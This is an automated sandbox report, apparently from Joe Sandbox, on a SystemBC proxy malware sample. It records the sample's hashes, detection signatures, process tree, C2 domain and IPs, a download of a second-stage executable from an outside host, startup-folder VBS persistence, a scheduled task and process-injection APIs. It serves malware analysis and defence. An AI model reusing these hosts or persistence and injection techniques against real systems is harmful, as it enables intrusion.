Windows Analysis Report
uC4EETMDcz.exe

Overview

General Information

Sample name: uC4EETMDcz.exe (renamed because original name is a hash value)
Original sample name: 01b4e5031bce630ff9a75984dbce65e4.exe
Analysis ID: 1576044
MD5: 01b4e5031bce630ff9a75984dbce65e4
SHA1: 026f9b1f04df0b009aa478a4a072da9f38d695dd
SHA256: d7c59a22446f1c200c078a6e38131c755e1869717b939fa54b53360af4d2a059
Tags: exe, SystemBC, user-abuse_ch

Detection

SystemBC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected SystemBC
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uC4EETMDcz.exe (PID: 3660 cmdline: "C:\Users\user\Desktop\uC4EETMDcz.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • uC4EETMDcz.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\uC4EETMDcz.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wopbv.exe (PID: 368 cmdline: C:\ProgramData\faer\wopbv.exe MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • wopbv.exe (PID: 4324 cmdline: "C:\ProgramData\faer\wopbv.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wscript.exe (PID: 4048 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • brokerutil.exe (PID: 3196 cmdline: "C:\Users\user\AppData\Local\brokerutil.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
      • brokerutil.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Local\brokerutil.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • wopbv.exe (PID: 1456 cmdline: C:\ProgramData\faer\wopbv.exe MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
    • wopbv.exe (PID: 3088 cmdline: "C:\ProgramData\faer\wopbv.exe" MD5: 01B4E5031BCE630FF9A75984DBCE65E4)
  • cleanup
Name: SystemBC
Description: SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC. SystemBC has been observed occasionally, but more pronounced since June 2019. First samples go back to October 2018.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
{"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org"}
Source | Rule | Description | Author | Strings
0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
7.2.brokerutil.exe.3d87f90.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
1.2.uC4EETMDcz.exe.2be1354.0.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
11.2.wopbv.exe.322d6b8.0.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
7.2.brokerutil.exe.2e1ba64.0.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |
4.2.wopbv.exe.28ed188.0.raw.unpack | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security |

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , ProcessId: 4048, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs" , ProcessId: 4048, ProcessName: wscript.exe

Data Obfuscation

Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\uC4EETMDcz.exe, ProcessId: 3660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs
No Suricata rule has matched

AV Detection

Source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: SystemBC {"HOST1": "wodresomdaymomentum.org", "HOST2": "wodresomdaymomentum.org"}
Source: C:\ProgramData\faer\wopbv.exe, ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\brokerutil.exe, ReversingLabs: Detection: 57%
Source: uC4EETMDcz.exe, ReversingLabs: Detection: 57%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\brokerutil.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\faer\wopbv.exe, Joe Sandbox ML: detected
Source: uC4EETMDcz.exe, Joe Sandbox ML: detected
Source: uC4EETMDcz.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: uC4EETMDcz.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
Networking

Source: Malware configuration extractor, URLs: wodresomdaymomentum.org
Source: global traffic, TCP traffic: 192.168.2.6:49813 -> 78.41.139.3:4000
Source: Joe Sandbox View, ASN Name: NEO-CUSTFR NEO-CUSTFR
Source: unknown, TCP traffic detected without corresponding DNS query: 45.155.249.199
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /files/mailer/blue.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: 45.155.249.199
    Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: wodresomdaymomentum.org
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Mon, 16 Dec 2024 12:36:48 GMT
    Server: Apache/2.4.58 (Ubuntu)
    Content-Length: 276
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at 45.155.249.199 Port 80</address></body></html>
Source: wopbv.exe, 00000008.00000002.3390352551.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://45.155.249.199/files/mailer/blue.exe
Source: wopbv.exe, 00000008.00000002.3390000700.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp, String found in binary or memory: http://45.155.249.199/files/mailer/blue.exe%
Source: wopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://45.155.249.199/files/mailer/blue.exey
Source: uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://schemas.micr
Source: uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://schemas.micro
Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.000000000396C000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2744031290.0000000003E98000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3063157374.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\uC4EETMDcz.exe, Code function: 1_2_056F9CE8 NtResumeThread
Source: C:\Users\user\Desktop\uC4EETMDcz.exe, Code function: 1_2_056F73C0 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\uC4EETMDcz.exe, Code function: 1_2_056F9CE0 NtResumeThread
Source: C:\Users\user\Desktop\uC4EETMDcz.exe, Code function: 1_2_056F73B8 NtProtectVirtualMemory
Source: C:\ProgramData\faer\wopbv.exe, Code function: 4_2_05549CF0 NtResumeThread
Source: C:\ProgramData\faer\wopbv.exe, Code function: 4_2_055473C0 NtProtectVirtualMemory
Source: C:\ProgramData\faer\wopbv.exe, Code function: 4_2_05549CE8 NtResumeThread
Source: C:\ProgramData\faer\wopbv.exe, Code function: 4_2_055473B8 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\brokerutil.exe, Code function: 7_2_056349D8 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\brokerutil.exe, Code function: 7_2_05636F00 NtResumeThread
Source: C:\Users\user\AppData\Local\brokerutil.exe, Code function: 7_2_056349D0 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\brokerutil.exe, Code function: 7_2_05636EF8 NtResumeThread
Source: C:\ProgramData\faer\wopbv.exe, Code function: 11_2_05C49CF0 NtResumeThread
Source: C:\ProgramData\faer\wopbv.exe, Code function: 11_2_05C473C0 NtProtectVirtualMemory
Source: C:\ProgramData\faer\wopbv.exe, Code function: 11_2_05C49CE8 NtResumeThread
Source: C:\ProgramData\faer\wopbv.exe, Code function: 11_2_05C473B8 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\uC4EETMDcz.exe, File created: C:\Windows\Tasks\Test Task17.job
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAE5137_2_00EAE513
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAA6607_2_00EAA660
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EACBA27_2_00EACBA2
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA0D387_2_00EA0D38
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA3E687_2_00EA3E68
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAA6507_2_00EAA650
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA68687_2_00EA6868
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA68597_2_00EA6859
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA6DE87_2_00EA6DE8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D1B6B87_2_02D1B6B8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D116EF7_2_02D116EF
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D1B6AA7_2_02D1B6AA
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D117007_2_02D11700
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D13B407_2_02D13B40
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D13B327_2_02D13B32
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D19C107_2_02D19C10
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D19C207_2_02D19C20
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054EE5867_2_054EE586
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054E89F87_2_054E89F8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054EE9037_2_054EE903
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_055800407_2_05580040
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0558001A7_2_0558001A
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056347487_2_05634748
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05630FB07_2_05630FB0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05637A107_2_05637A10
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056347397_2_05634739
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05630FA07_2_05630FA0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05637A067_2_05637A06
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056FC6287_2_056FC628
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0572CD907_2_0572CD90
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057287C07_2_057287C0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057287B07_2_057287B0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057298507_2_05729850
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057200407_2_05720040
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057298407_2_05729840
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057200077_2_05720007
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0572D0C77_2_0572D0C7
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0583ED487_2_0583ED48
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0583E1A07_2_0583E1A0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_058200077_2_05820007
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_058200407_2_05820040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159E51311_2_0159E513
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159A66011_2_0159A660
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159CBA911_2_0159CBA9
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_01591E2D11_2_01591E2D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159A65011_2_0159A650
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159685911_2_01596859
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159686811_2_01596868
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_01596DE811_2_01596DE8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567B6B811_2_0567B6B8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567170011_2_05671700
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_056716EF11_2_056716EF
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567B6AA11_2_0567B6AA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05679C2011_2_05679C20
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05679C1011_2_05679C10
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05673B4011_2_05673B40
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05673B3011_2_05673B30
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05ACE58611_2_05ACE586
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05AC8C3811_2_05AC8C38
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05ACE90311_2_05ACE903
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05B6001611_2_05B60016
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05B6004011_2_05B60040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4399811_2_05C43998
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4713011_2_05C47130
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4398811_2_05C43988
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4712111_2_05C47121
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4A80011_2_05C4A800
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4A7F011_2_05C4A7F0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0CD9011_2_05D0CD90
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D087C011_2_05D087C0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D087B011_2_05D087B0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0D0C711_2_05D0D0C7
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0985011_2_05D09850
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0004011_2_05D00040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0984011_2_05D09840
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0000711_2_05D00007
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0E3A811_2_05D0E3A8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E1ED4811_2_05E1ED48
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E1E1A011_2_05E1E1A0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0004011_2_05E00040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0000711_2_05E00007
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0001F11_2_05E0001F
Source: uC4EETMDcz.exe | Static PE information: invalid certificate
Source: uC4EETMDcz.exe, 00000001.00000002.2396236865.00000000052B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameVgvkhncsxo.dll" vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameVgvkhncsxo.dll" vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000000.2145964643.0000000000768000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOoxmrww.exe0 vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe, 00000001.00000002.2377714535.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe | Binary or memory string: OriginalFilenameOoxmrww.exe0 vs uC4EETMDcz.exe
Source: uC4EETMDcz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: uC4EETMDcz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: brokerutil.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uC4EETMDcz.exe, -.cs | Cryptographic APIs: 'CreateDecryptor'
Source: brokerutil.exe.1.dr, -.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
